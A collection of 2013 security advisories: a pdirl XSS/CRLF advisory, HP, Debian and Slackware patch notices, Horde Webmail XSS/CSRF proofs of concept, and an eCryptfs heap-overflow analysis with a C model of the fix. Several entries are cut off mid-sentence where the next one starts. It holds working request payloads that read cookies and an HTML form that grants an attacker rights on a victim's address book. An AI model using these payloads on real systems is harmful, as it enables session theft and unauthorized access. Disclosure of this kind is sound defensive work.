pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities
Document Title:
===============
pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1130

Release Date:
=============
2013-11-01

Vulnerability Laboratory ID (VL-ID):
====================================
1130

Common Vulnerability Scoring System:
====================================
3.4

Product & Service Introduction:
===============================
pdirl (PHPDirListing) is a tiny directory listing program. It is meant to be better looking and more useful than the directory listings produced by Apache. "I didn't want to reinvent the wheel, so I looked for an existing PHP script and found PHPDL by Greg Johnson; I added some features to it. (1.0.x is no longer based on PHPDL.)"

(Copy of the Vendor Homepage: http://pdirl.newroots.de/ )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered multiple web vulnerabilities in the pdirl PHP Listing v1.0.4 web application.

Vulnerability Disclosure Timeline:
==================================
2013-11-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Greg Johnson
Product: pdirl PHP Listing - Web Application 1.0.4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple client-side (non-persistent) cross site scripting vulnerabilities were found in the official pdirl PHP Directory Listing web application. They allow a remote attacker to inject script code into the page a victim's browser renders by crafting the GET request the victim follows. The injection points are in index.php: the request path (including the ./.pdirl directory and its icons/ and templates/ subdirectories) and the `directory` GET parameter are reflected into the response without adequate output encoding. Successful exploitation results in session hijacking, client-side phishing, unauthorized external redirects and manipulation of the affected page content in the victim's browser.
Vulnerable Module(s):
    [+] .pdirl

Vulnerable File(s):
    [+] index.php

Vulnerable Path(s):
    [+] ../icons/
    [+] ../icons/default
    [+] ../template/
    [+] ../template/default
    [+] ../.pdirl/templates

Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerabilities can be exploited by remote attackers without a privileged web application user account, but with low user interaction (the victim has to open the crafted link). For demonstration or to reproduce ...

PoC: Client-Side Cross Site Scripting

GET /[PATH]/?onmouseover='prompt(7331)'bad= HTTP/1.1
GET /[PATH]/.pdirl/?onmouseover='prompt(document.cookie)'bad= HTTP/1.1
GET /[PATH]/.pdirl/icons/?/title1<ScRiPt>prompt(document.cookie)</ScRiPt> HTTP/1.1
GET /[PATH]/.pdirl/icons/default/?onmouseover='prompt(document.cookie)'bad= HTTP/1.1
GET /[PATH]/.pdirl/templates/?onmouseover='prompt(document.cookie)'bad= HTTP/1.1
GET /[PATH]/.pdirl/templates/default/?/title1<ScRiPt>prompt(document.cookie)</ScRiPt> HTTP/1.1
GET /[PATH]/index.php/%22onmouseover%3d'prompt(document.cookie)'bad%3d%22 HTTP/1.1
GET /[PATH]/index.php?directory=.pdirl/templates/%22%20onmouseover%3dprompt(7331)%20bad%3d%22 HTTP/1.1

PoC: CRLF Injection / HTTP Response Splitting

GET /[PATH]/index.php?directory=%0d%0a%20[CSRF:FORM:INJECT!]&sortkey=name

PoC: Full Path Disclosure Links

GET /[PATH]/index.php?directory='\'\);|]*{%0d%0a%00%bf%27'&sortkey=name&sortorder=SORT_DESC HTTP/1.1
GET /[PATH]/index.php?directory='\'\);|]*{%0d%0a%00%bf%27'&gosearch=Search... HTTP/1.1
GET /[PATH]/index.php?directory=./&gosearch='\'\);|]*{%0d%0a%00%bf%27' HTTP/1.1
GET /[PATH]/index.php?directory=./?directory=./&search=..%c0%af HTTP/1.1

Security Risk:
==============
1.1 The security risk of the client-side cross site scripting web vulnerabilities is estimated as medium.
1.2 The security risk of the CRLF injection (client-side form/CSRF injection) web vulnerability is estimated as medium(-).
1.3 The security risk of the full path disclosure issue is estimated as low.
Credits & Authors:
==================
lincoln.dll (linc0ln@hotmail.com) [www.hackinq.pl]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including
[security bulletin] HPSBMU02931 rev.2 - HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03960916

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03960916
Version: 2

HPSBMU02931 rev.2 - HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-10-30
Last Updated: 2013-10-30

Potential Security Impact: Injection of arbitrary code, remote disclosure of privileged information, improper privilege management and cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in HP Service Manager. The vulnerabilities could be exploited to allow injection of arbitrary code, remote disclosure of privileged information, improper privilege management and cross site scripting (XSS).

Note: this Service Manager update includes updated Apache Tomcat, OpenSSL and Oracle JRE components that address security issues in those components.

References: CVE-2013-4830 (SSRT101316), CVE-2013-4831, CVE-2013-4832, CVE-2013-4833

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager v7.11, v9.32, v9.31, v9.30

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2013-4830    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5
CVE-2013-4831    (AV:N/AC:M/Au:S/C:P/I:P/A:N)       4.9
CVE-2013-4832    (AV:N/AC:M/Au:S/C:P/I:N/A:N)       3.5
CVE-2013-4833    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided patches to the below versions to resolve this issue.
Download the updates for impacted versions from HP SSO.

Service Manager versions

  Component            Patch        URL
  AIX Server           9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00446
  HP Itanium Server    9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00447
  Linux Server         9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00448
  Solaris Server       9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00449
  Windows Server       9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00450
  Web Tier             9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00451
  Windows Client       9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00452
  KnowledgeManagement  9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00454
  Mobility             9.32.0005    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00455
  Applications         9.32.0016    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00456

HP Service Manager v7.11 versions

  Component            Patch           URL
  AIX Server           7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00482
  HP Itanium Server    7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00483
  HP parisc Server     7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00484
  Linux x86 Server     7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00485
  Solaris Server       7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00486
  Windows Server       7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00487
  Web Tier             7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00488
  Windows Client       7.11.655 p21    http://support.openview.hp.com/selfsolve/document/LID/HPSM_00489

HISTORY
Version:1 (rev.1) - 14 October 2013 Initial release
Version:2 (rev.2) - 30 October 2013 added HP Service Manager v7.11 to impacted versions

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by
[SECURITY] [DSA 2790-1] nss security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2790-1                   secur...@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
November 02, 2013                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : nss
Vulnerability  : uninitialized memory read
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-1739
Debian Bug     : 726473

A flaw was found in the way the Mozilla Network Security Service library
(nss) read uninitialized data when there was a decryption failure. A
remote attacker could use this flaw to cause a denial of service
(application crash) for applications linked with the nss library.

The oldstable distribution (squeeze) is not affected by this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 2:3.14.4-1. The packages in the stable distribution were updated
to the latest patch release 3.14.4 of the library to also include a
regression bugfix for a flaw that affects the libpkix certificate
verification cache. More information can be found via:
https://developer.mozilla.org/en-US/docs/NSS/NSS_3.14.4_release_notes

For the testing distribution (jessie), this problem has been fixed in
version 2:3.15.2-1.

For the unstable distribution (sid), this problem has been fixed in
version 2:3.15.2-1.

We recommend that you upgrade your nss packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJSdJSfAAoJEAVMuPMTQ89EolAQAKJMoAA1k5jKzEa6sXzt2nut
Osw/Km/Jio6qBQdUMc40QeRWjy3dCNtufE6t+ffRH/NUg/ZREE+5YPbKYuZXqKVQ
LJ+7CUlv8FClKafoW1UvHjPmj8lfTFjI1e31dh4KgOkqanZ2ufVwWETolvEoEkTs
gySXv1z5e0/OgpSHx9pHmJbYmC+p4+fex/eK3OrCGynQNh1MAarcetiXVl4QnbFe
uJ5YE4jdJGJ4p746b1zVKGKLNKtVW5cT6h4HMZ6EHLBbGAfi35i+Qa9ZdQMS1ncC
3xssfmmGVR+J8hzyMNx3USCHRe5CjqOIsR0oaEcmijO/m/7w+GSzk0jIYxI9PgyV
RmRf+sLoSBSvlaFHTfaqOF/vPJXL1S7vPkMNWJ/pQQk8QueEsTdH+FzZh99aQ1eP
IMHd2GYF3sgD8LjafxFBkXLVDTgfR3LilMOAZHGVM6+jFySeGiv80ywGnvlWuuV4
2fDNiOFClDeziECezCQSxsizC2TZ9jHyB7NcxxhYt40w5q66i8UhLBWXwKjXLRco
FVvAHIs8RfSlHDvIag2+TttSuTuQ20zAS83lXMsA2UyP4PLGGpRg6mPcfs4TgGN3
69oq4YaySp6dxvu8WcxdMQWMKj4LamT+XUch6q44euNystg1MNILK7tgGeFti0Mk
vSnOSXPCRrlLrCsHVR2/
=4pBK
-----END PGP SIGNATURE-----
[slackware-security] mozilla-thunderbird (SSA:2013-307-01)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  mozilla-thunderbird (SSA:2013-307-01)

New mozilla-thunderbird packages are available for Slackware 13.37, 14.0,
and -current to fix security issues.

Here are the details from the Slackware 14.0 ChangeLog:
+--------------------------+
patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    http://www.mozilla.org/security/known-vulnerabilities/thunderbirdESR.html
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.10esr-x86_64-1_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.10esr-x86_64-1_slack14.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.0-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.0-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 13.37 package:
991bfbd613a42ac8088118f824d77f15  mozilla-thunderbird-17.0.10esr-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
ded7c8bfdb23fe335f5be18b76874420  mozilla-thunderbird-17.0.10esr-x86_64-1_slack13.37.txz

Slackware 14.0 package:
f2195286f809a1e0df44fb2a08c9c9ba  mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
2e67fdb730d5c585d6489adb65aadc72  mozilla-thunderbird-17.0.10esr-x86_64-1_slack14.0.txz

Slackware -current package:
5896f50d2a7b8e7b0cd98bbfafbe3884  xap/mozilla-thunderbird-24.1.0-i486-1.txz

Slackware x86_64 -current package:
385e35f8a0ebfbdb0e89bd13e8f4b120  xap/mozilla-thunderbird-24.1.0-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iEYEARECAAYFAlJ1+0UACgkQakRjwEAQIjP2WwCggYqxLGXyRYMS1qyba6gmW3Eh
yhIAn0hMR3vQjTH2Y7aYoUr0Q+rBquN0
=spcq
-----END PGP SIGNATURE-----
XSS and CSRF Horde Groupware Web mail Edition
# Exploit Title: XSS and CSRF Horde Groupware Web mail Edition
Author: Marcela Benetrix
Date: 10/28/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

# Groupware Webmail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project.

## CSRF/XSS Location

"Save search as a virtual Address book" was found to be vulnerable to XSS and CSRF attacks: the form carries no anti-CSRF token, and the virtual address book name it submits is rendered back without output encoding.

## PoC

<html>
  <body>
    <form action="http://www.victim.com/horde/turba/search.php" method="POST">
      <input type="hidden" name="source" value="" />
      <input type="hidden" name="criteria" value="" />
      <input type="hidden" name="val" value="" />
      <input type="hidden" name="search" value="Search" />
      <input type="hidden" name="save_vbook" value="on" />
      <input type="hidden" name="vbook_name" value="<script>alert(1)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

### CVE identifier

CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.

## Vendor Notification

10/28/2013: Reported to the developers. They replied immediately and fixed the problem: http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure
CSRF Horde Groupware Web mail Edition
# Exploit Title: CSRF Horde Groupware Web mail Edition
Author: Marcela Benetrix
Date: 10/28/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

# Groupware Webmail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project.

## CSRF Location

The "change of permissions" (share editing) functionality was found to be missing a unique anti-CSRF token in its form, so a logged-in victim who loads an attacker-controlled page can be made to grant the attacker read, edit and delete rights on the victim's address book.

## PoC

<html>
  <body>
    <form action="http://www.victim.com/horde/services/shares/edit.php" method="POST">
      <input type="hidden" name="actionID" value="editform" />
      <input type="hidden" name="cid" value="37" />
      <input type="hidden" name="app" value="turba" />
      <input type="hidden" name="owner_input" value="kenedyK" />
      <input type="hidden" name="u_names[||new_input]" value="AttackerUserName" />
      <input type="hidden" name="u_read[||new_input]" value="on" />
      <input type="hidden" name="u_edit[||new_input]" value="on" />
      <input type="hidden" name="u_delete[||new_input]" value="on" />
      <input type="hidden" name="g_names[||new]" value="" />
      <input type="hidden" name="save_and_finish" value="Save and Finish" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Preconditions: The attacker must know the owner value, which is the victim's username, and the ID (cid) of the address book. Once he has them, he can launch the attack.

### CVE identifier

CVE-2013-6365.

## Vendor Notification

10/28/2013: Reported to the developers. They replied immediately and fixed the problem: http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow Vulnerability
+-------------------------------------------------------------------------------------------+
| XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow Vulnerability |
+-------------------------------------------------------------------------------------------+

Vulnerable versions:
 - linux kernel 2.6.18
Testbed: linux kernel 2.6.18
Type: Local
Impact: kernel panic or potential local privilege escalation.
Vendor: http://www.kernel.org
Author: x90c <geinblues *nospam* gmail dot com>
Site: x90c.org

=========
ABSTRACT:
=========

write_tag_3_packet() in the Linux kernel eCryptfs code is vulnerable to a heap buffer overflow, which leads to a kernel panic and potentially to privilege escalation. The length passed to the memcpy() in the vulnerable function is never checked against the destination buffer.

========
DETAILS:
========

ecryptfs_create() in ecryptfs/inode.c is called when a new file is created on an eCryptfs file system. From ecryptfs_create() the call chain eventually reaches the vulnerable memcpy() in write_tag_3_packet().

[write_tag_3_packet() in ecryptfs/keystore.c]:

	...
	} else /* no aes, no 0, 24 key size? */
		auth_tok->session_key.encrypted_key_size =
			crypt_stat->key_size;                       /* (1) */
	key_rec->enc_key_size =                                     /* (2) */
		auth_tok->session_key.encrypted_key_size;
	/* vulnerable point (2nd and 3rd arguments user controllable) */
	memcpy(key_rec->enc_key, auth_tok->session_key.encrypted_key,
	       key_rec->enc_key_size);
	...

At the vulnerable point key_rec->enc_key_size is a user-controllable variable: (1) stores crypt_stat->key_size into auth_tok->session_key.encrypted_key_size, and (2) stores that into key_rec->enc_key_size. In other words, crypt_stat->key_size arrives unchanged as the memcpy() length. The vulnerable branch is the else case above (the source comment: no AES, no 0/24-byte key size). If crypt_stat->key_size can be controlled, the copy overflows the heap-allocated key_rec->enc_key buffer. First, the call path from ecryptfs_create() in ecryptfs/inode.c to the vulnerable point:
[call path to the vulnerable point]

ecryptfs/inode.c::ecryptfs_create()
 +- ecryptfs/inode.c::ecryptfs_initialize_file()
     +- ecryptfs/crypto.c::ecryptfs_new_file_context()
     +- ecryptfs/inode.c::ecryptfs_write_metadata()
         -> ecryptfs/crypto.c::ecryptfs_write_headers_virt()
            -> ecryptfs/keystore.c::ecryptfs_generate_key_packet_set()
               -> ecryptfs/keystore.c::write_tag_3_packet()   (vulnerable function)
                  -> memcpy(key_rec->enc_key,                 /* vulnerable point */
                            auth_tok->session_key.encrypted_key,
                            key_rec->enc_key_size);  // XXX user controllable key_rec->enc_key_size!

ecryptfs_initialize_file() in ecryptfs/inode.c sets crypt_stat->key_size from a value passed to the kernel in the mount options: ecryptfs_new_file_context() copies mount_crypt_stat->global_default_cipher_key_size into crypt_stat->key_size, and global_default_cipher_key_size is set while the mount options are parsed.

[ecryptfs/crypto.c]:

int ecryptfs_new_file_context(struct dentry *ecryptfs_dentry)
{
	...
	crypt_stat->key_size =
		mount_crypt_stat->global_default_cipher_key_size;
	...

mount_crypt_stat->global_default_cipher_key_size is set from the 'ecryptfs_opt_ecryptfs_key_bytes' mount option (a user-controllable value):

[ecryptfs/main.c]:

static int ecryptfs_parse_options(struct super_block *sb, char *options)
{
	...
		case ecryptfs_opt_ecryptfs_key_bytes:
			cipher_key_bytes_src = args[0].from;
			cipher_key_bytes =
				(int)simple_strtol(cipher_key_bytes_src,
						   &cipher_key_bytes_src, 0);
			mount_crypt_stat->global_default_cipher_key_size =
				cipher_key_bytes;
			ecryptfs_printk(KERN_DEBUG,
					"The mount_crypt_stat "
					"global_default_cipher_key_size "
					"set to: [%d]\n", mount_crypt_stat->
					global_default_cipher_key_size);
			cipher_key_bytes_set = 1;
			break;

So the memcpy() copy size at the vulnerable point is set from a user-controllable value via the 'ecryptfs_key_bytes' mount option:

	/* vulnerable point */
	memcpy(key_rec->enc_key, auth_tok->session_key.encrypted_key,
	       key_rec->enc_key_size);

The second argument is also user controllable; this advisory only notes that without going into it.
=> heap buffer overflow!

==============
EXPLOIT CODES:
==============
 -

============
PATCH CODES:
============
 -

==============
VENDOR STATUS:
==============
2013/11/04 - The vulnerability discovered.
2013/11/04 - Advisory released on full-disclosure, bugtraq, packetstorm, exploit-db

DISCLAIMER:
The authors reserve the right not to be responsible for the topicality,
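The length flow the advisory traces (ecryptfs_key_bytes= mount option -> simple_strtol() narrowed to int -> global_default_cipher_key_size -> crypt_stat->key_size -> memcpy() length) can be modelled in user space. The following C is an added example, not x90c's code and not the kernel source: it reproduces the unchecked parse beside a checked one, computes how far a given key size would run past a fixed-size enc_key buffer, and shows the bound that belongs at the copy. The constants ECRYPTFS_MAX_KEY_BYTES (64) and ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES (512), the two struct layouts and all function names are assumptions made for the model.

```c
/* User-space model of the eCryptfs write_tag_3_packet() length flow.
 * Added example: not the advisory's code and not the kernel source.
 * The constants, struct layouts and function names are assumptions. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ECRYPTFS_MAX_KEY_BYTES            64   /* assumed: largest raw cipher key accepted */
#define ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES 512   /* assumed: size of the fixed enc_key buffers */

struct ecryptfs_session_key {
	size_t encrypted_key_size;
	unsigned char encrypted_key[ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES];
};

struct ecryptfs_key_record {
	size_t enc_key_size;
	unsigned char enc_key[ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES];
};

/* The parse the advisory quotes: strtol, narrowed to int, stored into a
 * size_t field with no range check. Returns what would land in
 * global_default_cipher_key_size for the given option value. */
size_t parse_key_bytes_unchecked(const char *value)
{
	int cipher_key_bytes = (int)strtol(value, NULL, 0);
	return (size_t)cipher_key_bytes;   /* a negative int becomes a huge size_t */
}

/* Hardened parse: the whole string must be a number in 1..ECRYPTFS_MAX_KEY_BYTES. */
int parse_key_bytes_checked(const char *value, size_t *out)
{
	char *end;
	long v;

	errno = 0;
	v = strtol(value, &end, 0);
	if (errno != 0 || end == value || *end != '\0')
		return -EINVAL;
	if (v <= 0 || v > ECRYPTFS_MAX_KEY_BYTES)
		return -EINVAL;
	*out = (size_t)v;
	return 0;
}

/* Bytes a memcpy() of key_size into enc_key would write past the buffer end (0 = fits). */
size_t tag3_overflow_bytes(size_t key_size)
{
	if (key_size > ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES)
		return key_size - ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES;
	return 0;
}

/* The copy at the vulnerable point with the check the advisory says is missing:
 * the length is bounded by both the source and the destination buffer. */
int write_tag_3_key_copy(struct ecryptfs_key_record *rec,
			 const struct ecryptfs_session_key *sk, size_t key_size)
{
	if (key_size == 0 || key_size > sizeof(rec->enc_key) ||
	    key_size > sizeof(sk->encrypted_key))
		return -EINVAL;
	rec->enc_key_size = key_size;
	memcpy(rec->enc_key, sk->encrypted_key, key_size);
	return 0;
}

int main(void)
{
	/* Constructed mount option values: a sane key size, an oversize one, a negative one. */
	const char *opts[] = { "32", "4096", "-1" };
	size_t i;

	for (i = 0; i < sizeof(opts) / sizeof(opts[0]); i++) {
		size_t unchecked = parse_key_bytes_unchecked(opts[i]);
		size_t checked = 0;
		int rc = parse_key_bytes_checked(opts[i], &checked);

		printf("ecryptfs_key_bytes=%s: unchecked=%zu (overflow by %zu bytes), checked rc=%d\n",
		       opts[i], unchecked, tag3_overflow_bytes(unchecked), rc);
	}
	return 0;
}
```

The point of the two parsers side by side is that the cast to int followed by storage into a size_t is itself a second bug: "-1" does not merely pass the range check, it becomes SIZE_MAX, so any later comparison against a buffer size has to be done before the narrowing, on the long strtol() returned.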
[SECURITY] [DSA 2791-1] tryton-client security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2791-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
November 04, 2013                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tryton-client
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no

Cedric Krier discovered that the Tryton client does not sanitize the
file extension supplied by the server when processing reports. As a
result, a malicious server could send a report with a crafted file
extension that causes the client to write any local file to which the
user running the client has write access.

For the oldstable distribution (squeeze), this problem has been fixed in
version 1.6.1-1+deb6u1.

For the stable distribution (wheezy), this problem has been fixed in
version 2.2.3-1+deb7u1.

We recommend that you upgrade your tryton-client packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJSd0JkAAoJEL97/wQC1SS+yxIIAKhE710knodmQwpAoCSobSwp
3cK7RK7PIMkiyAfLnNi646cU0xXGWydgwydxvm1VyULBtsBbaOaEXzOu8j2eOYVR
WQeUEy3kiDGE3J38QUzaf0MGejZI3jZQRERkYIxEOkEvsHZqZYLLe+BOvOt1Nz2T
vMMRqCjcAN+k1eE271tL9omWZxpsVCFG0uIGwfTmpCgf7QGKqnlnuMfrpeDQ+7/3
8VOE6EOrIBbFdXeXxW/TKM94Z8HGGkpU+GUJ2FiMyF0q0e8e4n2JG0sldnIeM9RF
cSrv5550JSSGgCLh3t3JtBTCsvQMGfnPKKdvx781vIz0inTgXy2SFAYaUukBPks=
=ZvvC
-----END PGP SIGNATURE-----